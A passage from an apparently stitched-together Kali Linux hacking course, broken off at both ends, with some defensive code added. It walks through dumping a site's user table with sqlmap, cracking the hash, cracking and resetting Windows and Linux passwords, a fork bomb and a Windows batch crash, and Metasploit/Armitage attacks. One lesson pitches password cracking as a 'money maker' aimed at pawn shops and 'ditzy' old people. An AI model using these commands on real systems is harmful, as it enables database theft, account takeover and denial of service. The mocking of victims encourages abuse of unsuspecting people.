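    """The defect the Step 1.b quote test detects: the URL parameter becomes
    part of the SQL text, so item_id=15' produces a syntax error."""
    query = f"SELECT name FROM item WHERE item_id = {item_id}"
    return conn.execute(query).fetchall()


def lookup_item_fixed(conn: sqlite3.Connection, item_id: str) -> List[Tuple[str]]:
    """Validate the parameter against the type the schema expects, then bind
    it; the value is never interpreted as SQL."""
    if not item_id.isdigit():
        raise ValueError("item_id must be numeric")
    return conn.execute("SELECT name FROM item WHERE item_id = ?", (int(item_id),)).fetchall()


def probe_result(func: Callable, conn: sqlite3.Connection, item_id: str) -> str:
    """Summarise what a caller observes: rows, a DBMS error, or a validation rejection."""
    try:
        rows = func(conn, item_id)
        return "rows:" + ",".join(r[0] for r in rows)
    except sqlite3.Error as e:
        return "sql-error:" + str(e)
    except ValueError as e:
        return "rejected:" + str(e)


def handle_request(conn: sqlite3.Connection, item_id: str) -> Tuple[int, str]:
    """What item.cgi should do: use the bound query and keep DBMS messages out
    of the response, which removes the tell-tale from Step 1.b entirely."""
    try:
        rows = lookup_item_fixed(conn, item_id)
    except ValueError:
        return 400, "invalid request"
    except sqlite3.Error:
        return 500, "internal error"  # details belong in the server log only
    if not rows:
        return 404, "not found"
    return 200, rows[0][0]


if __name__ == "__main__":
    conn = make_db()
    for value in ("15", "15'"):
        print(f"item_id={value!r}: vulnerable -> {probe_result(lookup_item_vulnerable, conn, value)}")
        print(f"item_id={value!r}: fixed      -> {probe_result(lookup_item_fixed, conn, value)}")
        print(f"item_id={value!r}: handler    -> {handle_request(conn, value)}")
```

The same two changes apply whatever the DBMS: parameter binding removes the injection, and a generic error response removes the information leak that makes the single-quote test work.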
Step 2: List DBMS databases using SQLMAP SQL Injection
As you can see from the screenshot above, I've found a website vulnerable to SQLMAP SQL Injection. Now I
need to list all the databases on that vulnerable database server (this is also called enumerating the number of
columns). As I am using SQLMAP, it will also tell me which one is vulnerable.
Run the following command against your vulnerable website:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs
Here:
sqlmap = name of the sqlmap binary
-u = target URL (e.g. "http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15")
--dbs = enumerate DBMS databases
This command reveals quite a bit of interesting info:
web application technology: Apache
back-end DBMS: MySQL 5.0
[10:55:53] [INFO] retrieved: information_schema
[10:55:56] [INFO] retrieved: sqldummywebsite
[10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com'
So we now have two databases that we can look into. information_schema is a standard database on almost
every MySQL server, so our interest would be in the sqldummywebsite database.
Step 3: List tables of target database using SQLMAP SQL Injection
Now we need to know how many tables this sqldummywebsite database has and what their names are. To find
that out, use the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables
Sweet, this database has 8 tables.
[10:56:20] [INFO] fetching tables for database: 'sqldummywebsite'
[10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:56:22] [INFO] the SQL query used returns 8 entries
[10:56:25] [INFO] retrieved: item
[10:56:27] [INFO] retrieved: link
[10:56:30] [INFO] retrieved: other
[10:56:32] [INFO] retrieved: picture
[10:56:34] [INFO] retrieved: picture_tag
[10:56:37] [INFO] retrieved: popular_picture
[10:56:39] [INFO] retrieved: popular_tag
[10:56:42] [INFO] retrieved: user_info
And of course we want to check what's inside the user_info table using SQLMAP SQL Injection, as that table
probably contains usernames and passwords.
Step 4: List columns on target table of selected database using SQLMAP SQL Injection
Now we need to list all the columns of the target table user_info in the sqldummywebsite database using SQLMAP
SQL Injection. SQLMAP SQL Injection makes it really easy; run the following command:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info --columns
This returns 5 entries from target table user_info of sqldummywebsite database.
[10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite'
[10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2'
[10:57:18] [INFO] the SQL query used returns 5 entries
[10:57:20] [INFO] retrieved: user_id
[10:57:22] [INFO] retrieved: int(10) unsigned
[10:57:25] [INFO] retrieved: user_login
[10:57:27] [INFO] retrieved: varchar(45)
[10:57:32] [INFO] retrieved: user_password
[10:57:34] [INFO] retrieved: varchar(255)
[10:57:37] [INFO] retrieved: unique_id
[10:57:39] [INFO] retrieved: varchar(255)
[10:57:41] [INFO] retrieved: record_status
[10:57:43] [INFO] retrieved: tinyint(4)
AHA! This is exactly what we are looking for: the target columns user_login and user_password.
Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection
SQLMAP SQL Injection makes it easy! Just run the following command again:
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump
Guess what, we now have the username from the database:
[10:58:39] [INFO] retrieved: userX
[10:58:40] [INFO] analyzing table dump for possible password hashes
Almost there; we now only need the password for this user. The next step shows just that.
Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection
You're probably getting used to how the SQLMAP SQL Injection tool is used. Use the following command to
extract the password for the user.
sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump
TADA!! We have the password.
[10:59:15] [INFO] the SQL query used returns 1 entries
[10:59:17] [INFO] retrieved: 24iYBc17xK0e.
[10:59:18] [INFO] analyzing table dump for possible password hashes
Database: sqldummywebsite
Table: user_info
[1 entry]
+---------------+
| user_password |
+---------------+
| 24iYBc17xK0e. |
+---------------+
But hang on, this password looks funny. This can't be someone's password. Someone who leaves their
website vulnerable like that just can't have a password like that.
That is exactly right. This is a hashed password. What that means is that the password is not stored in clear
text but as a hash, and now we need to crack it.
Step 7: Cracking the password
So the hashed password is 24iYBc17xK0e. How do you know what type of hash that is?
Step 7.a: Identify the hash type
Luckily, Kali Linux provides a nice tool that we can use to identify which type of hash this is. On the command
line type the following command and, at the prompt, paste the hash value:
hash-identifier
Excellent. So this is a DES(Unix) hash.
Step 7.b: Crack the hash using cudahashcat
First of all I need to know which hash-mode code to use for DES hashes. So let's check that:
cudahashcat --help | grep DES
So it's either 1500 or 3100. But it was a MySQL database, so it must be 1500.
I am running a computer that's got an NVIDIA graphics card. That means I will be using cudaHashcat. On my
laptop, I have an AMD ATI graphics card, so I will be using oclHashcat on my laptop. If you're on VirtualBox or
VMware, neither cudahashcat nor oclhashcat will work. You must install Kali on either a persistent USB or a
hard disk. Instructions are on the website; search around.
I saved the hash value 24iYBc17xK0e. in the file DES.hash. The following is the command I am running:
cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt
Interesting find: the usual Hashcat was unable to determine the code for the DES hash (it's not in its help menu).
However, both cudaHashcat and oclHashcat found and cracked the key.
Anyhow, here's the cracked password: abc123.
24iYBc17xK0e.:abc123
Sweet, we now even have the password for this user.
Lesson 8: Cracking Windows Passwords in Kali Linux
This is probably your number one money maker: pawn shops whose forfeited computers need to be sold, and
citizens and old people who are just ditzy. Enjoy.
Crack and reset the system password locally using Kali
Insert the USB live CD and boot your PC. Make sure that Boot from USB is the first option in the boot menu of the
BIOS.
Boot the Windows machine with the live CD. On the Kali Linux boot menu, select Live (forensic mode). Kali
Linux initializes, and when it has loaded, open a terminal window and navigate to the Windows password
database file.
Crack the Windows password with ophcrack:
After loading live Kali Linux, go to the System menu > ophcrack and click OK.
Ophcrack uses rainbow tables to crack NTLM and LM hashes into plain text; it's a free Windows password
cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of
the method. If you have a complex password it will take a lot longer than for simple passwords, and with the free
tables your password may never be cracked.
Once the crack is done you will see the password in plain text; write it down and reboot the machine to log in. If
your password isn't cracked, you can also log in as one of the other users with admin rights and then change
your password from within Windows.
With the free tables available you will not be able to crack every password, but the paid tables range from $100
to $1000. Windows protects the passwords as NTLM hashes, which get stored in the SAM file. We simply
need to target this file to retrieve the password.
Now you can see the ophcrack application window. Here, click Load > Encrypted SAM.
After that we need to give the path to the SAM directory, which by default is /mnt/hda1/WINDOWS/System32;
click Choose.
Here we can see the saved hashes, now with the username and user ID.
Now click the Crack button and wait for the password. It's quick and easy.
That's it. It'll show the password. If you are unsuccessful with the free tables, install more tables. I downloaded
the XP free small and the Vista free tables. Once you have downloaded the tables you will need to unzip them
in separate folders. I made a folder called "hash-tables" and then made 2 more folders within it for each table
to unzip to.
Run the program and click the "Tables" button. Select the table you downloaded and click "Install", navigate to
the folder where you unzipped the table, select it and then click "OK". You should see green lights next to the
tables you installed.
Reset the Windows password with chntpw:
Navigate to the Windows password database file. Almost all versions of Windows save the passwords in the SAM
file. This file is usually located under /Windows/System32/config. On your system it may look something like
this: /media/hda1/Windows/System32/config. In general the SAM database is in
/media/name_of_hard_drive/Windows/System32/config.
Type the command chntpw -l SAM and it will list all the usernames that are contained on the Windows system.
#chntpw -l SAM
The command gives us a list of usernames on the system. When we have the username we want to modify,
we simply run the command chntpw -u "username" SAM.
In the example below we typed chntpw -u "Sanjai sathish" SAM and we get the following menu:
#chntpw -u "Sanjai sathish" SAM
We now have the option of clearing the password, changing the password, or promoting the user to
administrator. Changing the password does not always work on Windows 7 and 8 systems; it may work on XP
systems, so it is recommended to clear the password. Then you will be able to log in with a blank password.
You can also promote the user to a local administrator.
Crack the password in Linux using John the Ripper:
John the Ripper is a fast password cracker; its primary purpose is to detect weak Unix passwords. Besides
several crypt(3) password hash types most commonly found on various Unix systems, Windows LM hashes are
supported out of the box, plus lots of other hashes and ciphers in the community-enhanced version.
John the Ripper is a popular dictionary-based password cracking tool. It uses a wordlist full of passwords and
then tries to crack a given password hash using each password from the wordlist. In other words, this is
called brute-force password cracking and is the most basic form of password cracking. It is also the most time-
and CPU-consuming technique: the more passwords to try, the more time required.
But still, if you want to crack a password locally on your system, then john is one of the good tools to try. John is
in the top 10 security tools in Kali Linux.
In this topic I am going to show you how to use the unshadow command along with john to crack the passwords
of users on a Linux system. On Linux the username/password details are stored in the following 2 files:
#/etc/passwd
#/etc/shadow
The actual password hash is stored in /etc/shadow, and this file is accessible only with root access to the
machine. So try to get this file from your own Linux system, or first create a new user with a simple password. I
will create a new user on my Linux system named happy, with password chess.
Now that our new user is created, it's time to crack his password.
#unshadow
The unshadow command basically combines the data of /etc/passwd and /etc/shadow to create 1 file with
username and password details. Usage is quite simple:
#unshadow /etc/passwd /etc/shadow > ~/crack
We redirected the output of the unshadow command to a new file called crack.
Now this new file shall be cracked by john. For the wordlist we shall be using the password list that comes with
john on Kali Linux. It is located at the path /usr/share/john/password.lst, or you can use your own
password lists too.
#john --wordlist=/usr/share/john/password.lst ~/crack
In the above command john was able to crack the hash and get us the password "chess" for the user
"happy". Now john was able to crack it only because the password "chess" was present in the password list. If it
were not there, then john would have failed.
Use the --show option to list all the cracked passwords reliably:
#john --show ~/crack
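Two things in this lesson decide how fast john or hashcat finishes: whether the password is in the wordlist, and which crypt(3) scheme protects it. The 13-character DES(Unix) hash recovered in Step 7 (24iYBc17xK0e.) belongs to the weakest scheme still found in the wild (it keeps only the first 8 characters of the password and has a 12-bit salt), while modern sha512crypt, yescrypt and bcrypt entries are far slower to attack. The Python audit below is an example added to this lesson, not part of the original tutorial or of john; it parses constructed /etc/shadow lines (the DES hash is the one from Step 7, every other hash is a made-up placeholder of the right shape) and reports the accounts a defender should rotate first. Reading the real /etc/shadow needs root, as the lesson says.

```python
import re

# crypt(3) prefixes and the scheme they denote. The bare 13-character form
# has no prefix: that is traditional DES crypt, "DES(Unix)" in hash-identifier.
HASH_ALGORITHMS = {
    "$1$": "md5crypt",
    "$2a$": "bcrypt", "$2b$": "bcrypt", "$2y$": "bcrypt",
    "$5$": "sha256crypt",
    "$6$": "sha512crypt",
    "$7$": "scrypt",
    "$y$": "yescrypt",
    "$gy$": "gost-yescrypt",
}
WEAK_ALGORITHMS = {"descrypt", "md5crypt"}
DES_CRYPT_RE = re.compile(r"^[./0-9A-Za-z]{13}$")


def identify_hash(field: str) -> str:
    """Classify the password field of one /etc/shadow entry."""
    if field == "":
        return "empty"            # no password at all: login without one
    if field.startswith(("!", "*")):
        return "locked"           # account cannot log in with a password
    # Longest prefix first so "$gy$" is not mistaken for "$y$".
    for prefix in sorted(HASH_ALGORITHMS, key=len, reverse=True):
        if field.startswith(prefix):
            return HASH_ALGORITHMS[prefix]
    if DES_CRYPT_RE.match(field):
        return "descrypt"
    return "unknown"


def audit_shadow(text: str):
    """Return (user, scheme, is_weak) for every entry in shadow-format text."""
    findings = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 2:
            continue
        scheme = identify_hash(fields[1])
        weak = scheme in WEAK_ALGORITHMS or scheme == "empty"
        findings.append((fields[0], scheme, weak))
    return findings


def weak_accounts(text: str):
    """Usernames whose stored secret a wordlist attack would reach fastest."""
    return [user for user, _, weak in audit_shadow(text) if weak]


# Constructed shadow file. Only the DES hash for "happy" comes from the lesson;
# the sha512crypt/md5crypt/yescrypt values are placeholders of the right length.
SAMPLE_SHADOW = "\n".join([
    "root:!:19700:0:99999:7:::",
    "daemon:*:19700:0:99999:7:::",
    "alice:$6$exampleSalt$" + "A" * 86 + ":19700:0:99999:7:::",
    "bob:$1$exmplslt$" + "B" * 22 + ":19700:0:99999:7:::",
    "carol:$y$j9T$exampleSalt$" + "C" * 43 + ":19700:0:99999:7:::",
    "happy:24iYBc17xK0e.:19700:0:99999:7:::",
    "guest::19700:0:99999:7:::",
])

if __name__ == "__main__":
    for user, scheme, weak in audit_shadow(SAMPLE_SHADOW):
        print(f"{user:8} {scheme:14} {'ROTATE' if weak else 'ok'}")
```

On a real system the remedy is to set the hashing scheme in /etc/login.defs (ENCRYPT_METHOD) to a modern one and force the flagged users to change their password, since an existing DES or MD5 hash cannot be upgraded without the plaintext.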
Just like most other things associated with hacking, a denial of service attack is not
everyone's cup of tea. It, however, can be understood if explained properly. In this
tutorial, I'll try to give you a big picture of denial of service attacks, before I start
using geeky terms like packets and all that. We'll start at the easiest point.
What effect does a denial of service attack have
Wireless hacking usually gives you the password of a wireless network. A man in the
middle attack lets you spy on network traffic. Exploiting a vulnerability and sending a
payload gives you access and control over the target machine. What exactly does a
Denial of Service (DOS) attack do? Basically, it robs the legitimate owner of a
resource of the right to use it. I mean, if I successfully perform a DOS on your
machine, you won't be able to use it anymore. In the modern scenario, it is used to
disrupt online services. Many hacktivist groups (internet activists who use hacking as
a form of active resistance; a name worth mentioning here is Anonymous) carry out
Distributed Denial of Service attacks on government and private websites to make them
listen to the people's opinion (the legitimacy of this method of dictating your opinion
has been a topic of debate, and a lot of hacktivists had to serve jail time for
participating in DDOS). So basically it's just what its name suggests: Denial Of
Service.
Basic Concept
It uses the fact that while a service can be more than sufficient to cater to the demands
of the intended users, a drastic increase in unwelcome users can make the service go
down. Most of us use phrases like "This website was down the other day" without
any idea what it actually means. Well, now you do. To give you a good idea of what is
happening, I'll take the example from the movie "We Are Legion".
Scenario One : Multiplayer online game
Now consider you are playing an online multiplayer game. There are millions of
other people who also play this game. Now there's a pool in the game that everyone
likes to visit. Now you and your friends know that you have the power of numbers.
There are a lot of you, and together you decide to make identical characters in the
game. And then all of you go and block the access to the pool. You just carried out a
denial of service attack. The users of the game have now been deprived of a service
which they had obtained the right to use when they signed up for the game. This is
just what the guys at 4chan (birthplace and residence of Anonymous) did a long time
ago. This is the kind of thing that gives you a very basic idea of what a denial of service
attack can be.
They made a Swastika and blocked access to the pool
Scenario 2 : Bus stop
Now assume that, for some reason, you want to disrupt the bus service of your city
and stop people from using the service. To stop the legitimate people from
utilizing this service, you can call your friends to use it unnecessarily. Basically you
can invite millions of friends to come and crowd around all the bus stops and take the
buses without any purpose. Practically it is not feasible, since you don't have millions
of friends, and they are definitely not wasting their time and money riding aimlessly
from one place to another.
So while this may seem impossible in the real world, in the virtual world you can
cause as much load as a thousand (or even a million) users alone at the click of a
button. There are many tools out there for this purpose; however, you are not
recommended to use them, as a DOS on someone else is illegal and easy to
detect (Knock, knock. It's the police). We will come back to this later, and do a DOS
on our own computer.
How denial of service attacks are carried out
Basically, when you visit a website, you send them a request to deliver their content to
you. What you send is a packet. Actually, it takes more than just one packet; you need
a lot of them. But still, the bandwidth that you consume in requesting the server to
send you some data is very little. In return, the data they send you is huge. This takes
up server resources, which they pay for. A legitimate view can easily earn more
than the server costs on account of advertisements, etc. So companies buy servers that
can provide enough data transfer for their regular users. However, if the number of users
suddenly increases, the server gives up. It goes down. And since the company knows
it is under DOS, it just turns off the server, so that it does not have to waste its monetary
resources on a DOS, and waits till the DOS stops. Now with modern computers and
bandwidth, we alone can easily pretend to be a thousand or even more users at once.
While this is not good for the server, it is not something that can make it succumb
(your computer is not the only thing that gets better with time; the servers do too).
However, if a lot of people like you do a DOS attack, it becomes a distributed denial
of service attack. This can easily be fatal for a server. It's just like you go to a page
and start refreshing it very fast, maybe a thousand times every second. And you are
not the only one. There are a thousand others that are doing the same thing. So basically
you guys are equivalent to more than a million users using the site simultaneously,
and that's not something the server can take. Sites like Google and Facebook have
stronger servers, and algorithms that can easily identify a DOS and block the traffic
from that IP. But it's not just the websites that get better; the black hat hackers too
are improving every day. This leaves a huge scope for understanding DOS attacks and
becoming an asset to one of these sides (the good, the bad and the ugly).
A Live DOS on your Kali Machine
We are going to execute a command in the Kali Linux terminal that will cripple the
operating system and make it hang. It will most probably work on other Linux
distributions too.
Warning: This code will freeze Kali Linux, and most probably it will not recover from
the shock. You'll lose any unsaved data. You will have to restart the machine the hard
way (turn off the virtual machine directly, or cut the power supply if it's a real machine).
Just copy-paste the code and your computer is gone.
:(){ :|:& };:
The machine froze right after I pressed Enter. I had to power it off from the VMware
interface.
What basically happened is that the one-line command asked the operating system to
keep opening processes very fast for an infinite period of time. It just gave up.
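The one-liner above works only because nothing caps how many processes a single user may create. The standard Linux mitigation is a per-user process limit applied by pam_limits at login. The following /etc/security/limits.conf fragment is an example added to this lesson, not part of the original; the numbers are illustrative and should be sized to the workload.

```text
# /etc/security/limits.conf (read by pam_limits at login). Example added here;
# the values are illustrative, not from the lesson.
# <domain>   <type>   <item>   <value>
*            soft     nproc    1024
*            hard     nproc    2048
# Caveat: wildcard lines are not applied to root. The Kali session in this
# lesson runs as root, so these two lines alone would not have saved it; a
# limit for root must name "root" explicitly in the domain field.
```

After logging in again, `ulimit -u` shows the soft limit in effect. With a cap in place the fork bomb stalls at the limit with "fork: retry: Resource temporarily unavailable" instead of consuming the whole process table, which leaves the system recoverable from another session. The soft limit is what applies by default; a user may raise it up to the hard limit, so the hard limit is the one that matters for protection.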
Here's something for the Windows users
Crashing Windows using a batch file
Open Notepad. Put the following code in it:
:1
Start
goto 1
Save the file as name.bat.
Bat here is the batch file extension. Run it. Game over.
It basically executes the second line, and the third line makes it go over to the first,
execute the second, and then over to first again, execute the second..... infinitely. So
again, denial of service. All the processing power is used by a useless command,
while you, the legitimate user, can't do anything.
Lesson 10: Introduction to Python
Python is a very diverse programming language and is excellent to learn. Today at codingsec we will run
through an introductory tutorial to get you more familiar with how the fundamentals of the language work. The
best way to learn to code is to actually put what you read today into practice!
## Python is easy to learn
print("Hello, World!")
Installing Python
In order to get started on learning Python, you will need to install the required software. For Python
programming you need a working Python installation and a text editor.
To download the required software, please visit http://www.python.org/download; you will find numerous download
links there. Python is very diverse and compatible with whatever operating system you are using.
LINUX, BSD, AND UNIX USERS
You are probably lucky and Python is already installed on your machine. To test it, type python3 on a
command line. If you see something like the output in the following section, you are set.
If you have to install Python, first try to use the operating system’s package manager or go to the repository
where your packages are available and get Python 3. Python 3.0 was released in December 2008; all the
distributions should have Python 3 available, so you may not need to compile Python 3 from scratch after
downloading the source code. Ubuntu and Fedora do have Python 3 binary packages available, but they are
not yet the default, so they need to be installed specially.
Roughly, here are the steps to compile Python on UNIX:
1. Download the .tgz file (use your web browser to get the gzipped tar file from
https://www.python.org/downloads/release/python-341).
2. Uncompress the tar file (put in the correct path to where you downloaded it):
$ tar -xvzf ~/Download/Python-3.4.1.tgz
... list of files as they are uncompressed ...
3. Change to the directory and tell the computer to compile and install the program:
$ cd Python-3.4.1/
$ ./configure --prefix=$HOME/python3_install
... lots of output. Watch for error messages here ...
$ make
... even more output. Hopefully no error messages ...
$ make install
4. Add Python 3 to your path. You can test it first by specifying the full path. You should add
$HOME/python3_install/bin to your PATH bash variable.
$ ~/python3_install/bin/python3
Python 3.4.1 (... size and date information ...)
[GCC 4.5.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>>
The above commands will install Python 3 to your home directory, which is probably what you want, but if you
skip the --prefix, it will install it to /usr/local. If you want to use the IDLE graphical code editor, you
need to make sure that the tk and tcl libraries, together with their development files, are installed on the
system. You will get a warning during the make phase if these are not available.
MAC USERS
Starting from Mac OS X (Tiger), Python ships by default with the operating system, but you will need to update
to Python 3 until OS X starts including Python 3 (check the version by starting python3 in a command line
terminal). Also IDLE (the Python editor) might be missing in the standard installation. If you want to (re-)install
Python, get the MacOS installer from the Python download site.
WINDOWS USERS
Download the appropriate Windows installer (the x86 MSI installer, if you do not have a 64-bit AMD or Intel
chip). Start the installer by double-clicking it and follow the prompts.
See https://docs.python.org/3/using/windows.html#installing-python for more information.
CONFIGURING YOUR PATH ENVIRONMENT VARIABLE
The PATH environment variable is a list of folders, separated by semicolons, in which Windows will look for a
program whenever you try to execute one by typing its name at a Command Prompt. You can see the current
value of your PATH by typing this command at a Command Prompt:
echo %PATH%
The easiest way to permanently change environment variables is to bring up the built-in environment variable
editor in Windows. How you get to this editor is slightly different on different versions of Windows.
On Windows 8: Press the Windows key and type Control Panel to locate the Windows Control Panel.
Once you’ve opened the Control Panel, select View by: Large Icons, then click on System. In the window that
pops up, click the Advanced System Settings link, then click the Environment
Variables... button.
On Windows 7 or Vista: Click the Start button in the lower-left corner of the screen, move your mouse
over Computer, right-click, and select Properties from the pop-up menu. Click the Advanced System
Settings link, then click the Environment Variables... button.
On Windows XP: Right-click the My Computer icon on your desktop and select Properties. Select
the Advanced tab, then click the Environment Variables... button.
Once you've brought up the environment variable editor, you'll do the same thing regardless of which version of
Windows you're running. Under System Variables in the bottom half of the editor, find a variable
called PATH. If there is one, select it and click Edit.... Assuming your Python root is C:\Python34, add
these two folders to your path (and make sure you get the semicolons right; there should be a semicolon
between each folder in the list):
C:\Python34
C:\Python34\Scripts
Note: If you want to double-click and start your Python programs from a Windows folder and not have the
console window disappear, you can add the following code to the bottom of each script:
print("Hello World")
# stops console from exiting
end_prog = ""
while end_prog != "q":
    end_prog = input("type q to quit")
INTERACTIVE MODE
Go into IDLE (also called the Python GUI). You should be presented with a window that has some text like this:
Python 3.0 (r30:67503, Dec 29 2008, 21:31:07)
[GCC 4.3.2 20081105 (Red Hat 4.3.2-7)] on linux2
Type "copyright", "credits" or "license()" for more information.
****************************************************************
Personal firewall software may warn about the connection IDLE makes to its subprocess using this computer's
internal loopback interface. This connection is not visible on any external interface and no data is sent to or
received from the Internet.
****************************************************************
IDLE 3.0
>>>
The >>> is Python's way of telling you that you are in interactive mode. In interactive mode what you type is
immediately run. Try typing 1+1 in. Python will respond with 2. Interactive mode allows you to test out and see
what Python will do. If you ever feel you need to play with new Python statements, go into interactive mode and
try them out.
CREATING AND RUNNING PROGRAMS
Go into IDLE if you are not already. In the menu at the top, select File then New File. In the new window that
appears, type the following:
print("Hello, World!")
Now save the program: select File from the menu, then Save. Save it as “hello.py” (you can save it in any folder
you want). Now that it is saved it can be run.
Next run the program by going to Run then Run Module (or if you have an older version of IDLE
use Edit then Run script). This will output Hello, World! in the Python Shell window.
PROGRAM FILE NAMES
It is very useful to stick to some rules regarding the file names of Python programs. Otherwise some
things might go wrong unexpectedly. These don't matter as much for programs, but you can have weird
problems if you don't follow them for module names (modules will be discussed later).
Always save the program with the extension .py. Do not put another dot anywhere else in the file name.
Only use standard characters for file names: letters, numbers, dash (-) and underscore (_).
White space (" ") should not be used at all (use underscores instead).
Do not use anything other than a letter (particularly no numbers!) at the beginning of a file name.
Do not use "non-English" characters (such as ä, ö, ü, å or ß) in your file names; even better, do not use them at
all when programming.
USING PYTHON FROM THE COMMAND LINE
If you don’t want to use Python from the command line, you don’t have to, just use IDLE. To get into interactive
mode just type python3 without any arguments. To run a program, create it with a text editor (Emacs has a
good Python mode) and then run it with python3 program_name.
RUNNING PYTHON PROGRAMS IN UNIX
If you are using Unix (such as Linux, Mac OS X, or BSD), if you make the program executable with chmod, and
have as the first line:
#!/usr/bin/env python3
you can run the python program with ./hello.py like any other command.
Thanks for learning!
Lesson 11: Introduction to Armitage
Installing Metasploit
Now Metasploit is not distributed with Kali Linux (it was distributed with BackTrack
though). However, Kali has it in its repositories, and it can be easily downloaded and
installed by executing:
apt-get install armitage
It will check dependencies, download the required files and install Armitage for
you. After it's done, you can start Armitage using the following commands:
service postgresql start
service metasploit start
armitage
You will get a screen like this. Leave the settings as they are, and click Connect.
You'll get a prompt like this (most of the time).
Now you'll see Armitage making some connections for you. For a short while it might
show failure messages (Connection Refused), but after some time Armitage will start,
and you'll end up with a window somewhat like this.
Now, while I do believe that the developer has succeeded in making a tool which
permits me to say "I'll take my leave, you can handle stuff from here", I'd still go
on for a while, helping you learn some basic stuff before I take my leave.
Armitage Basics
Now the tough coding (honestly there wasn't anything tough about that) that you had
to do with Metasploit, becomes as easy as a click on Armitage. Better yet, you can see
exactly what line of code is actually executed when you do something with your
mouse. As a start, you should do a quick scan with OS detect.
And while it does ask you to enter some stuff now, it is going to be pretty easy, you
just have to follow the example given by armitage with some modification.
First do your old ifconfig in a new terminal to find your IP:
ifconfig
Notice that most of the time, the first 6 digits are 192.168. You have to figure out the
next 3 digits. After that, you can enter the IP into the Armitage window. Look at the
sample it provided, just copy that, replacing the 1 with 154 as in my case.
Your final code should be 192.168.154.0/24. The 0/24 means it'll look at all the IPs
from 192.168.154.1 to 192.168.154.256. Actually it scans IPs from 192.168.xxx.0
through 192.168.xxx.255. Most of the time, you'll find your host in this range;
however, to include all IPs from 192.168.0.0 to 192.168.255.255, you may
use 192.168.0.0/16.
This is the automatically generated code after clicking OK.
Now, after a few seconds, you will see the following message, and it tells you exactly
what you're supposed to do next.
Now a couple of computers with respective OS icons will show up on your screen. As
expected, you'll have to go to Attacks -> Find attacks. There's no rocket science here,
and I'm not putting any more screenshots. After that, right click on the computer you
want to hack, and you'll see an attack option. Select whichever you want to try, enter
the requisites (you learnt how to do Information gathering in the previous Metasploit
tutorials). Everything will be quite easy, except for the fact that the exploits in attack
section will be possible exploits, that might or might not work. If you're expecting a
click to hack you a Windows 7 machine, then that's just not happening. It might work
with an unpatched XP machine, a ms03_026_dcom might do the trick, or the netapi
one. Good luck with playing around with this tool. And here's the official Armitage
website (media section link, useful vids and pics there) where you might find some
more guidance, though the tool doesn't need any.
Lesson 12: Sql Injection Basics
SQL Injection : How It Works
Introduction
Let's start at an apparently unrelated point. Assume we create a table in a SQL database. There are three main things you do with a database management system such as a SQL server. They are
Creating the structure of a table
Entering data
Making queries (and getting meaningful results from the data)
Now, when SQL is used to display data on a web page, it is common to let web users build their own queries. For example, if you go to a shopping website to buy a smartphone, you might want to specify what kind of smartphone you want. The site would probably store data about phones in a table with columns like Name, Price, Company, Screen Size, OS, etc.
They let you build a query using some sort of user-friendly drop-down form which lets you select your budget, preferred company, etc. So basically you, the user, construct queries and request data from their SQL server.
A query built only from fixed drop-down choices is relatively safe; the problem starts when free-form user input (a form field, a cookie, or a parameter in the URL such as ?cat=1) is pasted straight into the SQL text. A URL ending in .php is not proof that a site uses SQL, but it does indicate a server-side script that very often does, and every parameter in such a URL is a place where you can try to alter the query. The data in the SQL tables is meant to be protected. However, when we send a rogue value that breaks the syntax of the query, the SQL server returns an error, and the page often shows it. That error is a clear indication that the input reaches the database unfiltered, and that with properly crafted input we can make the database run queries of our choosing and hand over the otherwise private contents of its tables. This attack can be used to obtain confidential data like the list of usernames and passwords of all users on a website.
Steps
1. We have to find a website which is vulnerable to SQL injection (SQLi). Vulnerability has two criteria. Firstly, some parameter (usually in the URL) has to end up inside a query, and secondly, the site should behave differently, typically by showing an error, for some kind of crafted value or other. An error is a strong hint of a SQL injection vulnerability, though not proof; the next step confirms it.
2. After we know that a site is vulnerable, we need to execute a few queries to learn exactly how it responds to crafted input. Then we obtain information about the SQL version, the databases, and the tables and columns in them.
3. Finally we have to extract the information from the tables.
Vulnerabilities are found using your own creativity along with the well-known Google dorks (more on this in a later tutorial).
For the 2nd and 3rd step, there are two ways to do them.
Manually, using some standard payloads available online (and if you know SQL you can figure most of the stuff out yourself). For example, suppose the page runs the query
SELECT * FROM Users WHERE UserId = 105
and the 105 comes straight from the URL. If you replace it with 105 or 1=1, the database executes
SELECT * FROM Users WHERE UserId = 105 or 1=1
Now, while the first part of the condition, UserId = 105, is only true for one user, the condition 1=1 is always true, so the WHERE clause is true for every row and the query returns the data of all users. Effectively, you have the usernames, passwords and all other information about all the users of the website.
The figure (not reproduced here) shows two statements: the first is legitimate and returns srinivas's data only when the password is correct; the second returns the data of all accounts.

Using some tool. Some tools make the process easier. You still have to use commands, but using tools is much more practical once you have an idea what is actually happening. I don't recommend the GUI Windows tools found on malware-filled websites, which never work. Throughout this blog we have used Kali Linux, and if you really are serious about hacking there is no reason not to have Kali Linux installed. In Kali Linux there is a great tool called sqlmap that we'll be using.
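The manual "or 1=1" example above, carried through as an added worked example that is not part of the original tutorial: a small Python script against an in-memory SQLite database with constructed sample rows. It shows the error probe from step 1, the string-built query that leaks every row, and the parameterised query that is immune to it. The table, its rows and the function names are assumptions made for this example; a real site would use whatever database and language it runs on, but the two query patterns are the same.

```python
"""Added example (not from the original tutorial): the `or 1=1` injection
run against a constructed in-memory SQLite table, beside the error probe
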